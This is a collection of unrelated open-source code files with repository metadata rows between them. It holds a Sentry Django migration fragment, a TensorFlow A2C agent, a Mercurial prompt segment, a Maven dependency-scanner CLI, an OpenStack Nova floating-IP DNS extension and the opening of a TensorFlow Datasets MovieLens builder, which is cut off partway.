'avatar_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'avatar'", 'unique': 'True', 'to': "orm['sentry.Team']"})
},
'sentry.timeseriessnapshot': {
'Meta': {'unique_together': '()', 'object_name': 'TimeSeriesSnapshot', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'end': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'period': ('django.db.models.fields.IntegerField', [], {}),
'start': ('django.db.models.fields.DateTimeField', [], {}),
'values': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'sentry.db.models.fields.array.ArrayField', [], {'null': 'True'})})
},
'sentry.user': {
'Meta': {'unique_together': '()', 'object_name': 'User', 'db_table': "'auth_user'", 'index_together': '()'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_managed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_password_expired': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_sentry_app': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_active': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'last_password_change': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_column': "'first_name'", 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'session_nonce': ('django.db.models.fields.CharField', [], {'max_length': '12', 'null': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'})
},
'sentry.useravatar': {
'Meta': {'unique_together': '()', 'object_name': 'UserAvatar', 'index_together': '()'},
'avatar_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'avatar'", 'unique': 'True', 'to': "orm['sentry.User']"})
},
'sentry.useremail': {
'Meta': {'unique_together': "(('user', 'email'),)", 'object_name': 'UserEmail', 'index_together': '()'},
'date_hash_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'emails'", 'to': "orm['sentry.User']"}),
'validation_hash': ('django.db.models.fields.CharField', [], {'default': "u'tfq6tE9Duz48Ehl7NuSBrIVlGLs4yM09'", 'max_length': '32'})
},
'sentry.userip': {
'Meta': {'unique_together': "(('user', 'ip_address'),)", 'object_name': 'UserIP', 'index_together': '()'},
'country_code': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'region_code': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.useroption': {
'Meta': {'unique_together': "(('user', 'project', 'key'), ('user', 'organization', 'key'))", 'object_name': 'UserOption', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']", 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'value': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {})
},
'sentry.userpermission': {
'Meta': {'unique_together': "(('user', 'permission'),)", 'object_name': 'UserPermission', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'permission': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.userreport': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'UserReport', 'index_together': "(('project', 'event_id'), ('project', 'date_added'))"},
'comments': ('django.db.models.fields.TextField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']", 'null': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'event_user_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.widget': {
'Meta': {'unique_together': "(('dashboard', 'order'), ('dashboard', 'title'))", 'object_name': 'Widget', 'index_together': '()'},
'dashboard': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Dashboard']"}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'display_options': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'display_type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'order': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'sentry.widgetdatasource': {
'Meta': {'unique_together': "(('widget', 'name'), ('widget', 'order'))", 'object_name': 'WidgetDataSource', 'index_together': '()'},
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'order': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'widget': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Widget']"})
}
}
complete_apps = ['sentry']
|
bsd-3-clause
| 6,805,013,253,530,824,000
| 94.341226
| 234
| 0.580177
| false
| 3.845138
| false
| false
| false
|
AlphaSmartDog/DeepLearningNotes
|
Note-6 A3CNet/Note-6.4 HS300指数增强/agent/agent.py
|
1
|
6362
|
import numpy as np
import tensorflow as tf
from agent.forward import ActorCriticNet
from params import *
def batch_choice(a, p):
action_list = [np.random.choice(a, p=i) for i in p]
return np.array(action_list)
# local network for advantage actor-critic which are also know as A2C
class Agent(object):
def __init__(self, name, access, inputs_shape, action_size):
self.Access = access
self.action_size = action_size
batch_size = inputs_shape[0]
self.batch_size = batch_size
with tf.variable_scope(name):
# placeholder
# [Time, Batch, Rows, Columns, Channels]
self.inputs = tf.placeholder(
tf.float32, [None] + inputs_shape, 'inputs')
# fix
inputs = tf.expand_dims(self.inputs, axis=-1)
# [T_MAX, Batch]
self.actions = tf.placeholder(
tf.int32, [None, batch_size], "actions")
# [T_MAX]
self.targets = tf.placeholder(
tf.float32, [None], "discounted_rewards")
self.gathers = tf.placeholder(
tf.int32, [None], 'gather_list')
# build network and adjust output probability
self.net = ActorCriticNet('AC-' + name)
policy, value = self.net(inputs, action_size)
policy = tf.clip_by_value(
policy, CLIP_MIN, CLIP_MAX, 'constraint')
# interface gather and step
# [Time, Batch, action_size] -> [T_MAX, Batch, action_size]
self.policy = tf.gather(policy, self.gathers)
self.value = tf.gather(value, self.gathers) # [T_MAX]
self.value = tf.squeeze(self.value, axis=1)
self.policy_step = policy[-1] # [Batch, action_size]
self.value_step = value[-1] # 1
# build other function
self._build_losses()
self._build_async_swap()
self._build_interface()
print('graph %s' % (str(name)))
def _build_losses(self):
# value loss
self.advantage = self.targets - self.value # [T_MAX]
value_loss = 0.5 * tf.square(self.advantage)
# policy loss
# [T_MAX, Batch, action_size] -> [T_MAX, Batch]
policy_action = tf.reduce_sum(
self.policy * tf.one_hot(self.actions, self.action_size), axis=2)
# [T_MAX, Batch]
policy_loss = -tf.log(policy_action) * tf.stop_gradient(
tf.expand_dims(self.advantage, axis=1))
# entropy loss [T_MAX, Batch]
entropy_loss = tf.reduce_sum(self.policy * tf.log(self.policy), axis=2)
# total loss
self.critic_loss = tf.reduce_mean(value_loss)
self.actor_loss = tf.reduce_mean(policy_loss + entropy_loss * ENTROPY_BETA)
self.total_loss = self.critic_loss + self.actor_loss
# interface
self.a_total_loss = self.total_loss
self.a_entropy_loss = tf.reduce_mean(entropy_loss)
self.a_policy_loss = tf.reduce_mean(policy_loss)
self.a_value_loss = tf.reduce_mean(value_loss)
self.a_critic_loss = self.critic_loss
self.a_actor_loss = self.actor_loss
self.a_advantage = tf.reduce_mean(self.advantage)
self.a_value_mean = tf.reduce_mean(self.value)
self.a_policy_mean = tf.reduce_mean(self.policy)
def _build_async_swap(self):
# Get gradients from local network using local losses
local_vars = self.get_trainable()
self.gradients = tf.gradients(self.total_loss, local_vars)
# Clip gradients
grads, self.global_norm = tf.clip_by_global_norm(
self.gradients, MAX_GRAD_NORM)
# Update global network
# Apply local gradients to global network
global_vars = self.Access.get_trainable()
self.update_global = self.Access.optimizer.apply_gradients(
zip(grads, global_vars))
# Update local network
assign_list = []
for gv, lv in zip(global_vars, local_vars):
assign_list.append(tf.assign(lv, gv))
self.update_local = assign_list
def _build_interface(self):
self.a_interface = [self.a_total_loss,
self.a_entropy_loss,
self.a_policy_loss,
self.a_value_loss,
self.a_actor_loss,
self.a_critic_loss,
self.a_advantage,
self.a_value_mean,
self.a_policy_mean,
self.a_advantage]
def get_trainable(self):
return list(self.net.get_variables())
def init_or_update_local(self, sess):
sess.run(self.update_local)
def get_step_policy(self, sess, inputs):
return sess.run(self.policy_step, {self.inputs: inputs})
def get_step_value(self, sess, inputs):
return sess.run(self.value_step, {self.inputs: inputs})
def get_losses(self, sess, inputs, actions, targets, gather_list):
"""
get all loss functions of network
:param sess:
:param inputs:
:param actions:
:param targets:
:return:
"""
feed_dict = {self.inputs: inputs,
self.actions: actions,
self.targets: targets,
self.gathers: gather_list}
return sess.run(self.a_interface, feed_dict)
def train_step(self, sess, inputs, actions, targets, gathers):
feed_dict = {self.inputs: inputs,
self.actions: actions,
self.targets: targets,
self.gathers: gathers}
sess.run(self.update_global, feed_dict)
# get stochastic action for train
def get_stochastic_action(self, sess, inputs, epsilon=0.9):
if np.random.uniform() < epsilon:
policy = sess.run(self.policy_step, {self.inputs: inputs})
return batch_choice(self.action_size, policy)
else:
return np.random.randint(self.action_size, size=self.batch_size)
# get deterministic action for test
def get_deterministic_policy_action(self, sess, inputs):
policy_step = sess.run(self.policy_step, {self.inputs: inputs})
return np.argmax(policy_step, axis=1)
|
mit
| -5,111,055,656,513,035,000
| 37.095808
| 83
| 0.568375
| false
| 3.709621
| false
| false
| false
|
saghul/shline
|
segments/hg.py
|
1
|
1578
|
def add_hg_segment():
import os
import subprocess
env = {"LANG": "C", "HOME": os.getenv("HOME")}
def get_hg_status():
has_modified_files = False
has_untracked_files = False
has_missing_files = False
try:
output = subprocess.check_output(['hg', 'status'], env=env)
except subprocess.CalledProcessError:
pass
else:
for line in output.split('\n'):
if line == '':
continue
elif line[0] == '?':
has_untracked_files = True
elif line[0] == '!':
has_missing_files = True
else:
has_modified_files = True
return has_modified_files, has_untracked_files, has_missing_files
try:
output = subprocess.check_output(['hg', 'branch'], env=env)
except (subprocess.CalledProcessError, OSError):
return
branch = output.rstrip()
if not branch:
return
bg = Color.REPO_CLEAN_BG
fg = Color.REPO_CLEAN_FG
has_modified_files, has_untracked_files, has_missing_files = get_hg_status()
if has_modified_files or has_untracked_files or has_missing_files:
bg = Color.REPO_DIRTY_BG
fg = Color.REPO_DIRTY_FG
extra = ''
if has_untracked_files:
extra += '+'
if has_missing_files:
extra += '!'
branch += (' ' + extra if extra != '' else '')
return shline.append(' %s %s ' % (shline.branch, branch), fg, bg)
add_hg_segment()
|
mit
| -5,181,100,140,301,123,000
| 29.346154
| 80
| 0.529151
| false
| 3.954887
| false
| false
| false
|
tpflueger/CSCI4900
|
scripts/main.py
|
1
|
1140
|
# SPDX-License-Identifier: MIT
'''Usage:
{0} scan (FILE)
{0} dependencies (JARNAME)
{0} (--help | --version)
Arguments:
scan Scan pom file for dependencies
dependencies Show dependency tree for jarFile
'''
import shutil
import sys
import os
from dependency_reader import DependencyReader
from docopt import docopt
__version__ = '1.0.0'
def main():
argv = docopt(
doc=__doc__.format(os.path.basename(sys.argv[0])),
argv=sys.argv[1:],
version=__version__
)
dependencyReader = DependencyReader()
if argv['scan']:
dependencyReader.getPom(os.path.abspath(argv['FILE']))
dependencyReader.getDependencies()
dependencyReader.relateDependencies()
dependencyReader.scanDependencies()
dependencyReader.createRelationships()
dependencyReader.retrieve_dependencies(None)
shutil.rmtree(dependencyReader.tempDirectoryPath)
elif argv['dependencies']:
dependencyReader.retrieve_dependencies(argv['JARNAME'])
shutil.rmtree(dependencyReader.tempDirectoryPath)
if __name__ == "__main__":
sys.exit(main())
|
mit
| -7,091,659,358,233,557,000
| 27.5
| 63
| 0.670175
| false
| 4.05694
| false
| false
| false
|
NoBodyCam/TftpPxeBootBareMetal
|
nova/api/openstack/compute/contrib/floating_ip_dns.py
|
1
|
10842
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 Andrew Bogott for the Wikimedia Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License
import urllib
import webob
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import exception
from nova import network
from nova.openstack.common import log as logging
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('compute', 'floating_ip_dns')
def make_dns_entry(elem):
elem.set('id')
elem.set('ip')
elem.set('type')
elem.set('domain')
elem.set('name')
def make_domain_entry(elem):
elem.set('domain')
elem.set('scope')
elem.set('project')
elem.set('availability_zone')
class FloatingIPDNSTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('dns_entry',
selector='dns_entry')
make_dns_entry(root)
return xmlutil.MasterTemplate(root, 1)
class FloatingIPDNSsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('dns_entries')
elem = xmlutil.SubTemplateElement(root, 'dns_entry',
selector='dns_entries')
make_dns_entry(elem)
return xmlutil.MasterTemplate(root, 1)
class DomainTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('domain_entry',
selector='domain_entry')
make_domain_entry(root)
return xmlutil.MasterTemplate(root, 1)
class DomainsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('domain_entries')
elem = xmlutil.SubTemplateElement(root, 'domain_entry',
selector='domain_entries')
make_domain_entry(elem)
return xmlutil.MasterTemplate(root, 1)
def _translate_dns_entry_view(dns_entry):
result = {}
result['ip'] = dns_entry.get('ip')
result['id'] = dns_entry.get('id')
result['type'] = dns_entry.get('type')
result['domain'] = dns_entry.get('domain')
result['name'] = dns_entry.get('name')
return {'dns_entry': result}
def _translate_dns_entries_view(dns_entries):
return {'dns_entries': [_translate_dns_entry_view(entry)['dns_entry']
for entry in dns_entries]}
def _translate_domain_entry_view(domain_entry):
result = {}
result['domain'] = domain_entry.get('domain')
result['scope'] = domain_entry.get('scope')
result['project'] = domain_entry.get('project')
result['availability_zone'] = domain_entry.get('availability_zone')
return {'domain_entry': result}
def _translate_domain_entries_view(domain_entries):
return {'domain_entries':
[_translate_domain_entry_view(entry)['domain_entry']
for entry in domain_entries]}
def _unquote_domain(domain):
"""Unquoting function for receiving a domain name in a URL.
Domain names tend to have .'s in them. Urllib doesn't quote dots,
but Routes tends to choke on them, so we need an extra level of
by-hand quoting here.
"""
return urllib.unquote(domain).replace('%2E', '.')
def _create_dns_entry(ip, name, domain):
return {'ip': ip, 'name': name, 'domain': domain}
def _create_domain_entry(domain, scope=None, project=None, av_zone=None):
return {'domain': domain, 'scope': scope, 'project': project,
'availability_zone': av_zone}
class FloatingIPDNSDomainController(object):
"""DNS domain controller for OpenStack API"""
def __init__(self):
self.network_api = network.API()
super(FloatingIPDNSDomainController, self).__init__()
@wsgi.serializers(xml=DomainsTemplate)
def index(self, req):
"""Return a list of available DNS domains."""
context = req.environ['nova.context']
authorize(context)
domains = self.network_api.get_dns_domains(context)
domainlist = [_create_domain_entry(domain['domain'],
domain.get('scope'),
domain.get('project'),
domain.get('availability_zone'))
for domain in domains]
return _translate_domain_entries_view(domainlist)
@wsgi.serializers(xml=DomainTemplate)
def update(self, req, id, body):
"""Add or modify domain entry"""
context = req.environ['nova.context']
authorize(context)
fqdomain = _unquote_domain(id)
try:
entry = body['domain_entry']
scope = entry['scope']
except (TypeError, KeyError):
raise webob.exc.HTTPUnprocessableEntity()
project = entry.get('project', None)
av_zone = entry.get('availability_zone', None)
if (scope not in ('private', 'public') or
project and av_zone or
scope == 'private' and project or
scope == 'public' and av_zone):
raise webob.exc.HTTPUnprocessableEntity()
if scope == 'private':
create_dns_domain = self.network_api.create_private_dns_domain
area_name, area = 'availability_zone', av_zone
else:
create_dns_domain = self.network_api.create_public_dns_domain
area_name, area = 'project', project
create_dns_domain(context, fqdomain, area)
return _translate_domain_entry_view({'domain': fqdomain,
'scope': scope,
area_name: area})
def delete(self, req, id):
"""Delete the domain identified by id. """
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(id)
# Delete the whole domain
try:
self.network_api.delete_dns_domain(context, domain)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=unicode(e))
return webob.Response(status_int=202)
class FloatingIPDNSEntryController(object):
"""DNS Entry controller for OpenStack API"""
def __init__(self):
self.network_api = network.API()
super(FloatingIPDNSEntryController, self).__init__()
@wsgi.serializers(xml=FloatingIPDNSTemplate)
def show(self, req, domain_id, id):
"""Return the DNS entry that corresponds to domain_id and id."""
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(domain_id)
name = id
entries = self.network_api.get_dns_entries_by_name(context,
name, domain)
entry = _create_dns_entry(entries[0], name, domain)
return _translate_dns_entry_view(entry)
@wsgi.serializers(xml=FloatingIPDNSsTemplate)
def index(self, req, domain_id):
"""Return a list of dns entries for the specified domain and ip."""
context = req.environ['nova.context']
authorize(context)
params = req.GET
floating_ip = params.get('ip')
domain = _unquote_domain(domain_id)
if not floating_ip:
raise webob.exc.HTTPUnprocessableEntity()
entries = self.network_api.get_dns_entries_by_address(context,
floating_ip,
domain)
entrylist = [_create_dns_entry(floating_ip, entry, domain)
for entry in entries]
return _translate_dns_entries_view(entrylist)
@wsgi.serializers(xml=FloatingIPDNSTemplate)
def update(self, req, domain_id, id, body):
"""Add or modify dns entry"""
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(domain_id)
name = id
try:
entry = body['dns_entry']
address = entry['ip']
dns_type = entry['dns_type']
except (TypeError, KeyError):
raise webob.exc.HTTPUnprocessableEntity()
entries = self.network_api.get_dns_entries_by_name(context,
name, domain)
if not entries:
# create!
self.network_api.add_dns_entry(context, address, name,
dns_type, domain)
else:
# modify!
self.network_api.modify_dns_entry(context, name, address, domain)
return _translate_dns_entry_view({'ip': address,
'name': name,
'type': dns_type,
'domain': domain})
def delete(self, req, domain_id, id):
"""Delete the entry identified by req and id. """
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(domain_id)
name = id
try:
self.network_api.delete_dns_entry(context, name, domain)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=unicode(e))
return webob.Response(status_int=202)
class Floating_ip_dns(extensions.ExtensionDescriptor):
"""Floating IP DNS support"""
name = "Floating_ip_dns"
alias = "os-floating-ip-dns"
namespace = "http://docs.openstack.org/ext/floating_ip_dns/api/v1.1"
updated = "2011-12-23T00:00:00+00:00"
def __init__(self, ext_mgr):
self.network_api = network.API()
super(Floating_ip_dns, self).__init__(ext_mgr)
def get_resources(self):
resources = []
res = extensions.ResourceExtension('os-floating-ip-dns',
FloatingIPDNSDomainController())
resources.append(res)
res = extensions.ResourceExtension('entries',
FloatingIPDNSEntryController(),
parent={'member_name': 'domain',
'collection_name': 'os-floating-ip-dns'})
resources.append(res)
return resources
|
apache-2.0
| 3,639,136,114,536,705,000
| 34.547541
| 78
| 0.590481
| false
| 4.19582
| false
| false
| false
|
tensorflow/datasets
|
tensorflow_datasets/structured/movielens.py
|
1
|
17907
|
# coding=utf-8
# Copyright 2021 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MovieLens dataset."""
import os
import textwrap
from typing import Any, Callable, Dict, Iterator, List, Optional, Tuple
from absl import logging
import tensorflow.compat.v2 as tf
import tensorflow_datasets.public_api as tfds
from tensorflow_datasets.structured import movielens_parsing
_CITATION = """
@article{10.1145/2827872,
author = {Harper, F. Maxwell and Konstan, Joseph A.},
title = {The MovieLens Datasets: History and Context},
year = {2015},
issue_date = {January 2016},
publisher = {Association for Computing Machinery},
address = {New York, NY, USA},
volume = {5},
number = {4},
issn = {2160-6455},
url = {https://doi.org/10.1145/2827872},
doi = {10.1145/2827872},
journal = {ACM Trans. Interact. Intell. Syst.},
month = dec,
articleno = {19},
numpages = {19},
keywords = {Datasets, recommendations, ratings, MovieLens}
}
"""
_DESCRIPTION = """
This dataset contains a set of movie ratings from the MovieLens website, a movie
recommendation service. This dataset was collected and maintained by [GroupLens]
(https://grouplens.org/), a research group at the University of Minnesota. There
are 5 versions included: "25m", "latest-small", "100k", "1m", "20m". In all
datasets, the movies data and ratings data are joined on "movieId". The 25m
dataset, latest-small dataset, and 20m dataset contain only movie data and
rating data. The 1m dataset and 100k dataset contain demographic data in
addition to movie and rating data.
- "25m": This is the latest stable version of the MovieLens dataset. It is
recommended for research purposes.
- "latest-small": This is a small subset of the latest version of the MovieLens
dataset. It is changed and updated over time by GroupLens.
- "100k": This is the oldest version of the MovieLens datasets. It is a small
dataset with demographic data.
- "1m": This is the largest MovieLens dataset that contains demographic data.
- "20m": This is one of the most used MovieLens datasets in academic papers
along with the 1m dataset.
For each version, users can view either only the movies data by adding the
"-movies" suffix (e.g. "25m-movies") or the ratings data joined with the movies
data (and users data in the 1m and 100k datasets) by adding the "-ratings"
suffix (e.g. "25m-ratings").
The features below are included in all versions with the "-ratings" suffix.
- "movie_id": a unique identifier of the rated movie
- "movie_title": the title of the rated movie with the release year in
parentheses
- "movie_genres": a sequence of genres to which the rated movie belongs
- "user_id": a unique identifier of the user who made the rating
- "user_rating": the score of the rating on a five-star scale
- "timestamp": the timestamp of the ratings, represented in seconds since
midnight Coordinated Universal Time (UTC) of January 1, 1970
The "100k-ratings" and "1m-ratings" versions in addition include the following
demographic features.
- "user_gender": gender of the user who made the rating; a true value
corresponds to male
- "bucketized_user_age": bucketized age values of the user who made the rating,
the values and the corresponding ranges are:
- 1: "Under 18"
- 18: "18-24"
- 25: "25-34"
- 35: "35-44"
- 45: "45-49"
- 50: "50-55"
- 56: "56+"
- "user_occupation_label": the occupation of the user who made the rating
represented by an integer-encoded label; labels are preprocessed to be
consistent across different versions
- "user_occupation_text": the occupation of the user who made the rating in
the original string; different versions can have different set of raw text
labels
- "user_zip_code": the zip code of the user who made the rating
In addition, the "100k-ratings" dataset would also have a feature "raw_user_age"
which is the exact ages of the users who made the rating
Datasets with the "-movies" suffix contain only "movie_id", "movie_title", and
"movie_genres" features.
"""
_FORMAT_VERSIONS = ['25m', 'latest-small', '20m', '100k', '1m']
_TABLE_OPTIONS = ['movies', 'ratings']
class MovieLensConfig(tfds.core.BuilderConfig):
"""BuilderConfig for MovieLens dataset."""
def __init__(self,
format_version: Optional[str] = None,
table_option: Optional[str] = None,
download_url: Optional[str] = None,
parsing_fn: Optional[Callable[[str], Iterator[Tuple[int, Dict[
str, Any]]],]] = None,
**kwargs) -> None:
"""Constructs a MovieLensConfig.
Args:
format_version: a string to identify the format of the dataset, one of
'_FORMAT_VERSIONS'.
table_option: a string to identify the table to expose, one of
'_TABLE_OPTIONS'.
download_url: a string url for downloading the dataset.
parsing_fn: a callable for parsing the data.
**kwargs: keyword arguments forwarded to super.
Raises:
ValueError: if format_version is not one of '_FORMAT_VERSIONS' or if
table_option is not one of '_TABLE_OPTIONS'.
"""
if format_version not in _FORMAT_VERSIONS:
raise ValueError('format_version must be one of %s.' % _FORMAT_VERSIONS)
if table_option not in _TABLE_OPTIONS:
raise ValueError('table_option must be one of %s.' % _TABLE_OPTIONS)
super(MovieLensConfig, self).__init__(**kwargs)
self._format_version = format_version
self._table_option = table_option
self._download_url = download_url
self._parsing_fn = parsing_fn
@property
def format_version(self) -> str:
return self._format_version
@property
def table_option(self) -> str:
return self._table_option
@property
def download_url(self) -> str:
return self._download_url
@property
def parsing_fn(
self) -> Optional[Callable[[str], Iterator[Tuple[int, Dict[str, Any]]],]]:
return self._parsing_fn
class Movielens(tfds.core.GeneratorBasedBuilder):
"""MovieLens rating dataset."""
BUILDER_CONFIGS = [
MovieLensConfig(
name='25m-ratings',
description=textwrap.dedent("""\
This dataset contains 25,000,095 ratings across 62,423 movies,
created by 162,541 users between January 09, 1995 and November 21,
2019. This dataset is the latest stable version of the MovieLens
dataset, generated on November 21, 2019.
Each user has rated at least 20 movies. The ratings are in
half-star increments. This dataset does not include demographic
data."""),
version='0.1.0',
format_version='25m',
table_option='ratings',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-25m.zip'),
parsing_fn=movielens_parsing.parse_current_ratings_data,
),
MovieLensConfig(
name='25m-movies',
description=textwrap.dedent("""\
This dataset contains data of 62,423 movies rated in the 25m
dataset."""),
version='0.1.0',
format_version='25m',
table_option='movies',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-25m.zip'),
parsing_fn=movielens_parsing.parse_current_movies_data,
),
# The latest-small dataset is changed over time. Its checksum might need
# updating in the future.
MovieLensConfig(
name='latest-small-ratings',
description=textwrap.dedent("""\
This dataset contains 100,836 ratings across 9,742 movies, created
by 610 users between March 29, 1996 and September 24, 2018. This
dataset is generated on September 26, 2018 and is the a subset of
the full latest version of the MovieLens dataset. This dataset
is changed and updated over time.
Each user has rated at least 20 movies. The ratings are in
half-star increments. This dataset does not include demographic
data."""),
version='0.1.0',
format_version='latest-small',
table_option='ratings',
download_url=('http://files.grouplens.org/datasets/movielens/'
